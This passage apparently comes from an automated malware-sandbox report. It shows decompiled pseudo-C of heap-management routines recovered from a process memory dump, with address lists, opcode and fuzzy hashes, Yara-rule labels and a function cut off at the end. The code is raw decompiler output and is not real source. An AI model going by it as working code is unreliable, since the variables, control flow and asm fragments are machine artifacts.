			E0303AB40(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				signed short _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr* _v28;
				intOrPtr _t69;
				intOrPtr* _t70;
				intOrPtr _t71;
				intOrPtr _t73;
				void* _t74;
				signed int _t77;
				signed int _t79;
				signed int _t82;
				signed int _t88;
				unsigned int _t97;
				unsigned int _t99;
				unsigned int _t105;
				unsigned int _t107;
				intOrPtr* _t111;
				unsigned int _t118;
				void* _t123;
				intOrPtr _t127;
				signed int _t128;
				void* _t131;
				signed char _t136;
				signed char _t141;
				signed char _t146;
				signed int _t151;
				signed int _t153;
				unsigned int _t155;
				intOrPtr _t158;
				void* _t164;
				signed short _t167;
				void* _t171;
				void* _t173;
				intOrPtr* _t175;
				intOrPtr* _t178;
				signed short _t180;
				signed short _t182;

				_t149 = __ecx;
				_t111 =  *((intOrPtr*)(__edx + 0x18));
				_v24 = __edx;
				_t69 =  *((intOrPtr*)(_t111 + 4));
				_t158 = _a12;
				_v8 = __ecx;
				_v16 = _a8 -  *((intOrPtr*)(__edx + 0x14));
				_v28 = _t111;
				if(_t111 == _t69) {
					L7:
					_t70 = _t111;
					goto L8;
				} else {
					_t127 = _a4;
					if(_t127 == 0) {
						_t171 = _t158 -  *((intOrPtr*)(_t69 + 0x14));
					} else {
						_t182 =  *(_t69 - 8);
						_v20 = _t69 + 0xfffffff8;
						if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
							_t105 =  *(__ecx + 0x50) ^ _t182;
							_v12 = _t105;
							_t107 = _v12;
							_t146 = _t105 >> 0x00000010 ^ _t105 >> 0x00000008 ^ _t107;
							if(_t107 >> 0x18 != _t146) {
								_push(_t146);
								E030DA80D(__ecx, _v20, 0, 0);
								_t149 = _v8;
							}
							_t182 = _v12;
							_t127 = _a4;
						}
						_t171 = _t158 - (_t182 & 0x0000ffff);
					}
					if(_t171 <= 0) {
						_t71 =  *_t111;
						if(_t127 == 0) {
							_t173 = _t158 -  *((intOrPtr*)(_t71 + 0x14));
						} else {
							_t180 =  *(_t71 - 8);
							_v20 = _t71 + 0xfffffff8;
							if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
								_t97 =  *(_t149 + 0x50) ^ _t180;
								_v12 = _t97;
								_t99 = _v12;
								_t141 = _t97 >> 0x00000010 ^ _t97 >> 0x00000008 ^ _t99;
								if(_t99 >> 0x18 != _t141) {
									_push(_t141);
									E030DA80D(_t149, _v20, 0, 0);
									_t149 = _v8;
								}
								_t180 = _v12;
								_t127 = _a4;
							}
							_t173 = _t158 - (_t180 & 0x0000ffff);
						}
						if(_t173 <= 0) {
							return  *_t111;
						} else {
							_t175 = _v24;
							if( *_t175 != 0 || _a8 !=  *((intOrPtr*)(_t175 + 4)) - 1) {
								_t128 = _v16;
								_t73 =  *((intOrPtr*)(_t175 + 0x1c));
								_t151 = _t128 >> 5;
								_t164 = ( *((intOrPtr*)(_t175 + 4)) -  *((intOrPtr*)(_t175 + 0x14)) >> 5) - 1;
								_t118 =  !((1 << (_t128 & 0x0000001f)) - 1) &  *(_t73 + _t151 * 4);
								_t74 = _t73 + _t151 * 4;
								if(1 == 0) {
									while(_t151 <= _t164) {
										_t118 =  *(_t74 + 4);
										_t74 = _t74 + 4;
										_t151 = _t151 + 1;
										if(_t118 == 0) {
											continue;
										} else {
											goto L28;
										}
										goto L51;
									}
									if(_t118 != 0) {
										goto L28;
									} else {
										goto L40;
									}
								} else {
									L28:
									if(_t118 == 0) {
										_t77 = _t118 >> 0x00000010 & 0x000000ff;
										if(_t77 != 0) {
											_t79 = ( *(_t77 + 0x2ff84d0) & 0x000000ff) + 0x10;
										} else {
											_t57 = (_t118 >> 0x18) + 0x2ff84d0; // 0x10008
											_t79 = ( *_t57 & 0x000000ff) + 0x18;
										}
									} else {
										_t82 = _t118 & 0x000000ff;
										if(_t118 == 0) {
											_t79 = ( *((_t118 >> 0x00000008 & 0x000000ff) + 0x2ff84d0) & 0x000000ff) + 8;
										} else {
											_t79 =  *(_t82 + 0x2ff84d0) & 0x000000ff;
										}
									}
									_t153 = (_t151 << 5) + _t79;
									if( *((intOrPtr*)(_t175 + 8)) != 0) {
										_t153 = _t153 + _t153;
									}
									_t70 =  *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x20)) + _t153 * 4));
									L8:
									return _t70;
								}
							} else {
								_t88 = _v16;
								if( *((intOrPtr*)(_t175 + 8)) != 0) {
									_t88 = _t88 + _t88;
								}
								_t178 =  *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x20)) + _t88 * 4));
								if(_t111 == _t178) {
									L40:
									return 0;
								} else {
									do {
										if(_t127 == 0) {
											_t131 = _t158 -  *((intOrPtr*)(_t178 + 0x14));
										} else {
											_t167 =  *(_t178 - 8);
											_t123 = _t178 - 8;
											if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
												_t155 =  *(_t149 + 0x50) ^ _t167;
												_t167 = _t155;
												_t136 = _t155 >> 0x00000010 ^ _t155 >> 0x00000008 ^ _t155;
												_t149 = _v8;
												if(_t155 >> 0x18 != _t136) {
													_push(_t136);
													E030DA80D(_t149, _t123, 0, 0);
													_t149 = _v8;
												}
											}
											_t111 = _v28;
											_t158 = _a12;
											_t131 = _t158 - (_t167 & 0x0000ffff);
										}
										if(_t131 <= 0) {
											return _t178;
										} else {
											goto L24;
										}
										goto L51;
										L24:
										_t178 =  *_t178;
										_t127 = _a4;
									} while (_t111 != _t178);
									goto L40;
								}
							}
						}
					} else {
						goto L7;
					}
				}
				L51:
			}

0x0303ab4a
0x0303ab51
0x0303ab57
0x0303ab5b
0x0303ab5e
0x0303ab61
0x0303ab64
0x0303ab67
0x0303ab6c
0x0303abbb
0x0303abbb
0x00000000
0x0303ab6e
0x0303ab6e
0x0303ab73
0x0303ad70
0x0303ab79
0x0303ab79
0x0303ab83
0x0303ab86
0x0303ab8b
0x0303ab8f
0x0303ab9a
0x0303ab9d
0x0303aba4
0x0308242c
0x03082439
0x0308243e
0x0308243e
0x0303abaa
0x0303abad
0x0303abad
0x0303abb5
0x0303abb5
0x0303abb9
0x0303abc6
0x0303abca
0x0303ad7a
0x0303abd0
0x0303abd0
0x0303abda
0x0303abdd
0x0303abe2
0x0303abe6
0x0303abf1
0x0303abf4
0x0303abfb
0x03082446
0x03082453
0x03082458
0x03082458
0x0303ac01
0x0303ac04
0x0303ac04
0x0303ac0c
0x0303ac0c
0x0303ac10
0x0303ad6b
0x0303ac16
0x0303ac16
0x0303ac1c
0x0303aca7
0x0303acba
0x0303acbd
0x0303acc8
0x0303acc9
0x0303accc
0x0303accf
0x0303ad00
0x0303ad04
0x0303ad07
0x0303ad0a
0x0303ad0d
0x00000000
0x0303ad0f
0x00000000
0x0303ad0f
0x00000000
0x0303ad0d
0x0303ad40
0x00000000
0x00000000
0x00000000
0x00000000
0x0303acd1
0x0303acd1
0x0303acd4
0x0303ad16
0x0303ad1b
0x0303ad54
0x0303ad1d
0x0303ad20
0x0303ad27
0x0303ad27
0x0303acd6
0x0303acd6
0x0303acdb
0x0303ad39
0x0303acdd
0x0303acdd
0x0303acdd
0x0303acdb
0x0303ace7
0x0303aced
0x0308247f
0x0308247f
0x0303acf6
0x0303abbd
0x0303abc3
0x0303abc3
0x0303ac2b
0x0303ac2f
0x0303ac32
0x03082460
0x03082460
0x0303ac3b
0x0303ac40
0x0303ad42
0x0303ad4a
0x0303ac46
0x0303ac46
0x0303ac48
0x0303ad5b
0x0303ac4e
0x0303ac4e
0x0303ac51
0x0303ac58
0x0303ac5d
0x0303ac66
0x0303ac6d
0x0303ac74
0x0303ac77
0x03082467
0x03082472
0x03082477
0x03082477
0x0303ac77
0x0303ac7d
0x0303ac83
0x0303ac88
0x0303ac88
0x0303ac8c
0x0303aca4
0x00000000
0x00000000
0x00000000
0x00000000
0x0303ac8e
0x0303ac8e
0x0303ac90
0x0303ac93
0x00000000
0x0303ac46
0x0303ac40
0x0303ac1c
0x00000000
0x00000000
0x00000000
0x0303abb9
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de5c252d983c07b293ba34c5485a6fd2fa9543855681d11d5401f1adf01a993f
Instruction ID: fe9abe99ff6731a39860724a32d03b03f5faef19584d24f24d0c3d3b511e1c38
Opcode Fuzzy Hash: de5c252d983c07b293ba34c5485a6fd2fa9543855681d11d5401f1adf01a993f
Instruction Fuzzy Hash: CD81D432B112198BDB24CB59C494BBEB7E9EF86311F194699D9C29F381D630ED44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 030E25DD, Relevance: .2, Instructions: 232
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E030E25DD(intOrPtr __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, signed int _a12, char* _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				void* __ebx;
				void* __edi;
				signed int _t74;
				signed int _t77;
				signed int _t80;
				signed int _t82;
				signed int _t102;
				signed int _t117;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				intOrPtr _t135;
				void* _t154;
				signed int _t160;
				signed int _t168;
				unsigned int _t175;
				signed int _t185;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t193;
				signed int _t194;
				unsigned int _t200;
				unsigned int _t201;
				signed char _t202;
				signed int _t204;
				signed int _t210;
				intOrPtr _t211;
				signed int _t212;

				_t133 = _a4;
				_v24 = __edx;
				_v16 = __ecx;
				E030E2E3F(__ecx, __edx, __eflags, _t133);
				_t204 = _a8;
				_t187 = 0x10;
				_t210 = (( *_t133 ^  *0x3106110 ^ _t133) >> 0x00000001 & 0x00007fff) - _t204;
				if(_t210 != 0 && ( *(_v16 + 0x38) & 0x00000001) != 0) {
					_t185 = (_t133 + _t204 * 0x00000008 + 0x00000fff & 0xfffff000) - _t133 + _t204 * 8 >> 3;
					_t132 = _t185 << 3;
					if(_t132 >= _t187) {
						if(__eflags != 0) {
							__eflags = _t132 - 0x20;
							if(_t132 < 0x20) {
								_t204 = _t204 + 1;
								_t210 = _t210 - 1;
								__eflags = _t210;
							}
						}
					} else {
						_t204 = _t204 + _t185;
						_t210 = _t210 - _t185;
					}
				}
				if(_t210 << 3 < _t187) {
					_t204 = _t204 + _t210;
				}
				_t74 =  *0x3106110; // 0xd8264b48
				asm("sbb edx, edx");
				_t189 =  !_t187 & _t210;
				_t211 = _v24;
				_v20 = _t189;
				 *_t133 = ( !_t74 ^  *_t133 ^ _t133) & 0x7fffffff ^  !_t74 ^ _t133;
				_t152 = _t133 - _t211;
				_t77 = _t133 - _t211 >> 0xc;
				_v28 = _t77;
				_t80 = (_t77 ^  *0x3106110 ^ _t133) & 0x000000ff;
				_v32 = _t80;
				 *(_t133 + 4) = _t80;
				_t82 = _t204 << 3;
				if(_t189 != 0) {
					_t82 = _t82 + 0x10;
				}
				_t190 = _t189 | 0xffffffff;
				_t154 = 0x3f;
				_v12 = E0305D340(_t82 + _t152 - 0x00000001 >> 0x0000000c | 0xffffffff, _t154 - (_t82 + _t152 - 1 >> 0xc), _t190);
				_v8 = _t190;
				_t191 = _t190 | 0xffffffff;
				_v12 = _v12 & E0305D0F0(_t86 | 0xffffffff, _v28, _t191);
				_v8 = _v8 & _t191;
				_t193 = _v12 & ( *(_t211 + 8) ^ _v12);
				_t212 = _v20;
				_t160 = _v8 & ( *(_t211 + 0xc) ^ _v8);
				_v12 = _t193;
				_v8 = _t160;
				if((_t193 | _t160) != 0) {
					 *(_t133 + 4) = _v32 | 0x00000200;
					_t117 = _a12 & 0x00000001;
					_v32 = _t117;
					if(_t117 == 0) {
						E0302FFB0(_t133, _t204, _v16);
						_t193 = _v12;
					}
					_t212 = _v20;
					_t200 =  !_v8;
					_t121 = _t200 & 0x000000ff;
					_t201 = _t200 >> 8;
					_t44 = _t121 + 0x2ffac00; // 0x6070708
					_t122 = _t201 & 0x000000ff;
					_t202 = _t201 >> 8;
					_t175 = _t202 >> 8;
					_t45 = _t122 + 0x2ffac00; // 0x6070708
					_t123 = _t202 & 0x000000ff;
					_t47 = _t175 + 0x2ffac00; // 0x6060706
					_t48 = _t123 + 0x2ffac00; // 0x6070708
					_t142 = _v16;
					if(E030E2FBD(_v16, _v24, _v12, _v8, ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff) + ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff), 1) < 0) {
						_t212 = _t212 + _t204;
						_t204 = 0;
					}
					if(_v32 == 0) {
						E03032280(_t125, _t142);
					}
					_t133 = _a4;
					 *_a16 = 0xff;
					 *(_t133 + 4) =  *(_t133 + 4) & 0xfffffdff;
				}
				 *_t133 =  *_t133 ^ (_t204 + _t204 ^  *_t133 ^  *0x3106110 ^ _t133) & 0x0000fffe;
				if(_t212 != 0) {
					_t194 = _t133 + _t204 * 8;
					_t134 =  *0x3106110; // 0xd8264b48
					if(_t204 == 0) {
						_t102 = ( *_t194 ^ _t134 ^ _t194) & 0x7fff0000;
						__eflags = _t102;
					} else {
						_t102 = _t204 << 0x10;
					}
					_t135 = _v24;
					 *_t194 = ((_t212 & 0x00007fff | 0xc0000000) + (_t212 & 0x00007fff | 0xc0000000) | _t102) ^ _t134 ^ _t194;
					_t168 = _t194 + _t212 * 8;
					 *(_t194 + 4) = (_t194 - _t135 >> 0x0000000c ^  *0x3106110 ^ _t194) & 0x000000ff;
					if(_t168 < _t135 + (( *(_t135 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t168 =  *_t168 ^ (_t212 << 0x00000010 ^  *_t168 ^  *0x3106110 ^ _t168) & 0x7fff0000;
					}
					E030E241A(_v16, _t135, _t194, _a12, _a16);
				}
				return _t204;
			}

0x030e25e6
0x030e25f6
0x030e25fb
0x030e25fe
0x030e2603
0x030e2610
0x030e2611
0x030e2613
0x030e262f
0x030e2634
0x030e2639
0x030e2641
0x030e2643
0x030e2646
0x030e2648
0x030e2649
0x030e2649
0x030e2649
0x030e2646
0x030e263b
0x030e263b
0x030e263d
0x030e263d
0x030e2639
0x030e2651
0x030e2653
0x030e2655
0x030e2657
0x030e265c
0x030e2668
0x030e266a
0x030e2675
0x030e267c
0x030e2680
0x030e2684
0x030e2687
0x030e2692
0x030e2695
0x030e2698
0x030e269d
0x030e26a2
0x030e26a4
0x030e26a4
0x030e26a8
0x030e26b2
0x030e26c0
0x030e26c6
0x030e26c9
0x030e26d1
0x030e26d4
0x030e26e2
0x030e26ea
0x030e26ed
0x030e26f1
0x030e26f6
0x030e26f9
0x030e2707
0x030e270d
0x030e2710
0x030e2713
0x030e2718
0x030e271d
0x030e271d
0x030e2722
0x030e2750
0x030e2758
0x030e275d
0x030e2760
0x030e2766
0x030e2769
0x030e276e
0x030e2771
0x030e2777
0x030e277d
0x030e2783
0x030e2791
0x030e27a7
0x030e27a9
0x030e27ab
0x030e27ab
0x030e27b1
0x030e27b4
0x030e27b4
0x030e27bc
0x030e27bf
0x030e27c2
0x030e27c2
0x030e27db
0x030e27df
0x030e27e5
0x030e27e8
0x030e27f0
0x030e27ff
0x030e27ff
0x030e27f2
0x030e27f4
0x030e27f4
0x030e281a
0x030e2824
0x030e2826
0x030e2834
0x030e2843
0x030e2858
0x030e2858
0x030e2866
0x030e2866
0x030e2873

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 115b5cd242a4eb52ad2e999da1dcc4400219e9e8d91cb62db343aab056ccb646
Instruction ID: 33b40ea7caa8cb36a0107291901f35521ebdc06444a824f9e75f25a3cb9254e1
Opcode Fuzzy Hash: 115b5cd242a4eb52ad2e999da1dcc4400219e9e8d91cb62db343aab056ccb646
Instruction Fuzzy Hash: 9881F272B011158FCB08DF79C8906BEBBF9FF88310B1A86A9D855DB385DA34D911CB60

Uniqueness

Uniqueness Score: -1.00%

Function 030E1D55, Relevance: .2, Instructions: 226
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E030E1D55(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t97;
				signed int _t101;
				signed int _t112;
				unsigned int _t113;
				signed int _t121;
				signed int _t128;
				signed int _t130;
				signed char _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t149;
				signed int _t150;
				void* _t154;
				signed int* _t161;
				signed int _t163;
				signed int _t164;
				void* _t167;
				intOrPtr _t171;
				signed int _t172;
				void* _t175;
				signed int* _t178;
				signed int _t179;
				signed int _t180;
				signed char _t181;
				signed char _t183;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				void* _t191;
				void* _t197;

				_t137 = __ecx;
				_push(0x64);
				_push(0x30f1070);
				E0306D08C(__ebx, __edi, __esi);
				 *(_t191 - 0x24) = __edx;
				 *((intOrPtr*)(_t191 - 0x20)) = __ecx;
				 *((intOrPtr*)(_t191 - 0x38)) = __ecx;
				_t135 = 0;
				 *(_t191 - 0x40) = 0;
				_t171 =  *((intOrPtr*)(__ecx + 0xc));
				_t189 =  *(__ecx + 8);
				 *(_t191 - 0x28) = _t189;
				 *((intOrPtr*)(_t191 - 0x3c)) = _t171;
				 *(_t191 - 0x50) = _t189;
				_t187 = __edx << 0xf;
				 *(_t191 - 0x4c) = _t187;
				_t190 = 0x8000;
				 *(_t191 - 0x34) = 0x8000;
				_t172 = _t171 - _t187;
				if(_t172 <= 0x8000) {
					_t190 = _t172;
					 *(_t191 - 0x34) = _t172;
				}
				 *(_t191 - 0x68) = _t135;
				 *(_t191 - 0x64) = _t135;
				L3:
				while(1) {
					if( *(_t191 + 8) != 0) {
						L22:
						 *(_t191 + 8) = _t135;
						E030E337F(_t137, 1, _t191 - 0x74);
						_t97 =  *((intOrPtr*)(_t191 - 0x20));
						_t175 =  *(_t97 + 0x14);
						 *(_t191 - 0x58) = _t175;
						_t139 = _t97 + 0x14;
						 *(_t191 - 0x44) = _t139;
						_t197 = _t175 - 0xffffffff;
						if(_t197 == 0) {
							 *_t139 =  *(_t191 - 0x24);
							E030E33B6(_t191 - 0x74);
							 *(_t191 - 0x40) = 1;
							_t60 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t101 =  *_t60;
							_t141 =  *(_t191 - 0x24);
							asm("bt [eax], ecx");
							_t103 = (_t101 & 0xffffff00 | __eflags > 0x00000000) & 0x000000ff;
							if(__eflags == 0) {
								goto L41;
							} else {
								_t103 = _t187 - 1 + _t190;
								__eflags = _t187 - 1 + _t190 -  *((intOrPtr*)(_t191 - 0x3c));
								if(_t187 - 1 + _t190 >=  *((intOrPtr*)(_t191 - 0x3c))) {
									goto L41;
								} else {
									__eflags = _t190 - 1;
									if(__eflags > 0) {
										_t143 =  *(_t191 - 0x28);
										_t178 = _t143 + (_t187 >> 5) * 4;
										_t144 = _t143 + (_t187 - 1 + _t190 >> 5) * 4;
										 *(_t191 - 0x50) = _t144;
										_t112 =  *_t178;
										 *(_t191 - 0x54) = _t112;
										_t113 = _t112 | 0xffffffff;
										__eflags = _t178 - _t144;
										if(_t178 != _t144) {
											_t103 = _t113 << _t187;
											__eflags =  *_t178 & _t103;
											if(( *_t178 & _t103) != 0) {
												goto L41;
											} else {
												_t103 =  *(_t191 - 0x50);
												while(1) {
													_t178 =  &(_t178[1]);
													__eflags = _t178 - _t103;
													if(_t178 == _t103) {
														break;
													}
													__eflags =  *_t178 - _t135;
													if( *_t178 != _t135) {
														goto L41;
													} else {
														continue;
													}
													goto L42;
												}
												_t103 = (_t103 | 0xffffffff) >>  !(_t187 - 1 + _t190);
												__eflags = _t103;
												_t149 =  *_t178;
												goto L38;
											}
										} else {
											_t154 = 0x20;
											_t103 = _t113 >> _t154 - _t190 << _t187;
											_t149 =  *(_t191 - 0x54);
											L38:
											_t150 = _t149 & _t103;
											__eflags = _t150;
											asm("sbb cl, cl");
											_t135 =  ~_t150 + 1;
											_t141 =  *(_t191 - 0x24);
											goto L39;
										}
									} else {
										if(__eflags != 0) {
											goto L41;
										} else {
											_t103 =  *(_t191 - 0x28);
											asm("bt [eax], edi");
											if(__eflags >= 0) {
												L40:
												_t136 =  *((intOrPtr*)(_t191 - 0x20));
												asm("lock btr [eax], ecx");
												 *((intOrPtr*)(_t191 - 0x60)) = (_t141 << 0xc) +  *((intOrPtr*)(_t136 + 8));
												 *((intOrPtr*)(_t191 - 0x5c)) = 0x1000;
												_push(0x4000);
												_push(_t191 - 0x5c);
												_push(_t191 - 0x60);
												_push(0xffffffff);
												_t103 = E030596E0();
											} else {
												L39:
												__eflags = _t135;
												if(_t135 == 0) {
													goto L41;
												} else {
													goto L40;
												}
											}
										}
									}
								}
							}
						} else {
							E030E33B6(_t191 - 0x74);
							_t172 = _t191 - 0x58;
							E0304E18B( *(_t191 - 0x44), _t172, 4, _t135,  *0x3105880);
							_t51 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t121 =  *_t51;
							asm("bt [eax], ecx");
							_t103 = (_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff;
							if(((_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff) == 0) {
								goto L41;
							} else {
								_t137 =  *((intOrPtr*)(_t191 - 0x20));
								continue;
							}
						}
					} else {
						 *(_t191 - 4) = _t135;
						_t103 = _t187 - 1 + _t190;
						 *(_t191 - 0x30) = _t103;
						if(_t103 <  *((intOrPtr*)(_t191 - 0x3c))) {
							__eflags = _t190 - 1;
							if(__eflags > 0) {
								_t179 =  *(_t191 - 0x28);
								_t161 = _t179 + (_t187 >> 5) * 4;
								 *(_t191 - 0x2c) = _t161;
								_t128 = _t179 + ( *(_t191 - 0x30) >> 5) * 4;
								 *(_t191 - 0x44) = _t128;
								_t180 =  *_t161;
								__eflags = _t161 - _t128;
								if(_t161 != _t128) {
									_t103 = (_t128 | 0xffffffff) << _t187;
									__eflags = _t103 & _t180;
									if((_t103 & _t180) != 0) {
										goto L5;
									} else {
										_t130 =  *(_t191 - 0x2c);
										_t164 =  *(_t191 - 0x44);
										while(1) {
											_t130 = _t130 + 4;
											 *(_t191 - 0x2c) = _t130;
											_t180 =  *_t130;
											__eflags = _t130 - _t164;
											if(_t130 == _t164) {
												break;
											}
											__eflags = _t180;
											if(_t180 == 0) {
												continue;
											} else {
												goto L5;
											}
											goto L19;
										}
										_t103 = (_t130 | 0xffffffff) >>  !( *(_t191 - 0x30));
										__eflags = _t103;
										goto L17;
									}
								} else {
									_t167 = 0x20;
									_t103 = (_t128 | 0xffffffff) >> _t167 - _t190 << _t187;
									L17:
									_t183 =  ~(_t180 & _t103);
									asm("sbb dl, dl");
									goto L18;
								}
							} else {
								if(__eflags != 0) {
									goto L5;
								} else {
									_t103 =  *(_t191 - 0x28);
									asm("bt [eax], edi");
									_t183 =  ~(_t172 & 0xffffff00 | __eflags > 0x00000000);
									asm("sbb dl, dl");
									L18:
									_t181 = _t183 + 1;
									__eflags = _t181;
								}
							}
						} else {
							L5:
							_t181 = _t135;
						}
						L19:
						 *(_t191 - 0x19) = _t181;
						_t163 = _t181 & 0x000000ff;
						 *(_t191 - 0x48) = _t163;
						 *(_t191 - 4) = 0xfffffffe;
						if(_t163 == 0) {
							L41:
							_t136 =  *((intOrPtr*)(_t191 - 0x20));
						} else {
							_t137 =  *((intOrPtr*)(_t191 - 0x20));
							goto L22;
						}
					}
					L42:
					__eflags =  *(_t191 - 0x40);
					if( *(_t191 - 0x40) != 0) {
						_t91 = _t136 + 0x14; // 0x14
						_t142 = _t91;
						 *_t91 = 0xffffffff;
						__eflags = 0;
						asm("lock or [eax], edx");
						_t103 = E0304DFDF(_t91, 1, _t142);
					}
					return E0306D0D1(_t103);
				}
			}

0x030e1d55
0x030e1d55
0x030e1d57
0x030e1d5c
0x030e1d63
0x030e1d66
0x030e1d69
0x030e1d6c
0x030e1d6e
0x030e1d71
0x030e1d74
0x030e1d77
0x030e1d7a
0x030e1d7d
0x030e1d82
0x030e1d85
0x030e1d88
0x030e1d8d
0x030e1d90
0x030e1d94
0x030e1d96
0x030e1d98
0x030e1d98
0x030e1d9b
0x030e1d9e
0x00000000
0x030e1da1
0x030e1da5
0x030e1e78
0x030e1e78
0x030e1e82
0x030e1e87
0x030e1e8a
0x030e1e8d
0x030e1e92
0x030e1e95
0x030e1e98
0x030e1e9b
0x030e1ede
0x030e1ee3
0x030e1ee8
0x030e1ef2
0x030e1ef2
0x030e1ef5
0x030e1ef8
0x030e1efe
0x030e1f03
0x00000000
0x030e1f09
0x030e1f0c
0x030e1f0e
0x030e1f11
0x00000000
0x030e1f17
0x030e1f17
0x030e1f1a
0x030e1f31
0x030e1f34
0x030e1f3f
0x030e1f42
0x030e1f45
0x030e1f47
0x030e1f4a
0x030e1f4d
0x030e1f4f
0x030e1f63
0x030e1f65
0x030e1f67
0x00000000
0x030e1f69
0x030e1f69
0x030e1f72
0x030e1f72
0x030e1f75
0x030e1f77
0x00000000
0x00000000
0x030e1f6e
0x030e1f70
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x030e1f70
0x030e1f83
0x030e1f83
0x030e1f85
0x00000000
0x030e1f85
0x030e1f51
0x030e1f53
0x030e1f5a
0x030e1f5c
0x030e1f87
0x030e1f87
0x030e1f87
0x030e1f8b
0x030e1f8d
0x030e1f90
0x00000000
0x030e1f90
0x030e1f1c
0x030e1f1c
0x00000000
0x030e1f22
0x030e1f22
0x030e1f25
0x030e1f28
0x030e1f97
0x030e1f97
0x030e1f9d
0x030e1fa7
0x030e1faa
0x030e1fb1
0x030e1fb9
0x030e1fbd
0x030e1fbe
0x030e1fc0
0x030e1f2a
0x030e1f93
0x030e1f93
0x030e1f95
0x00000000
0x00000000
0x00000000
0x00000000
0x030e1f95
0x030e1f28
0x030e1f1c
0x030e1f1a
0x030e1f11
0x030e1e9d
0x030e1ea0
0x030e1eae
0x030e1eb4
0x030e1ebc
0x030e1ebc
0x030e1ec2
0x030e1ec8
0x030e1ecd
0x00000000
0x030e1ed3
0x030e1ed3
0x00000000
0x030e1ed3
0x030e1ecd
0x030e1dab
0x030e1dab
0x030e1db1
0x030e1db3
0x030e1db9
0x030e1dbf
0x030e1dc2
0x030e1dda
0x030e1ddd
0x030e1de0
0x030e1de9
0x030e1dec
0x030e1def
0x030e1df1
0x030e1df3
0x030e1e0a
0x030e1e0c
0x030e1e0e
0x00000000
0x030e1e10
0x030e1e10
0x030e1e13
0x030e1e16
0x030e1e16
0x030e1e19
0x030e1e1c
0x030e1e1e
0x030e1e20
0x00000000
0x00000000
0x030e1e22
0x030e1e24
0x00000000
0x030e1e26
0x00000000
0x030e1e26
0x00000000
0x030e1e24
0x030e1e30
0x030e1e30
0x00000000
0x030e1e30
0x030e1df5
0x030e1df7
0x030e1e01
0x030e1e32
0x030e1e34
0x030e1e36
0x00000000
0x030e1e36
0x030e1dc4
0x030e1dc4
0x00000000
0x030e1dc6
0x030e1dc6
0x030e1dc9
0x030e1dcf
0x030e1dd1
0x030e1e38
0x030e1e38
0x030e1e38
0x030e1e38
0x030e1dc4
0x030e1dbb
0x030e1dbb
0x030e1dbb
0x030e1dbb
0x030e1e3a
0x030e1e3a
0x030e1e3d
0x030e1e40
0x030e1e43
0x030e1e6f
0x030e1fc7
0x030e1fc7
0x030e1e75
0x030e1e75
0x00000000
0x030e1e75
0x030e1e6f
0x030e1fca
0x030e1fca
0x030e1fce
0x030e1fd0
0x030e1fd0
0x030e1fd3
0x030e1fd9
0x030e1fde
0x030e1fe4
0x030e1fe4
0x030e1fee
0x030e1fee

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f661cf17ac7c6f7e927e1361e48d7a698d1c639eed5ed88da536e1f8c43c723
Instruction ID: dac74ac3bde10db670ddd9024f34e049fc44a927f852fefc50ea2708e1578e06
Opcode Fuzzy Hash: 8f661cf17ac7c6f7e927e1361e48d7a698d1c639eed5ed88da536e1f8c43c723
Instruction Fuzzy Hash: F1814B75F062198FCF18CFA8C480AECF7F6BF89314B184269E416AB395DB319945CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0301C600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0301C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x310d360 ^ _t125;
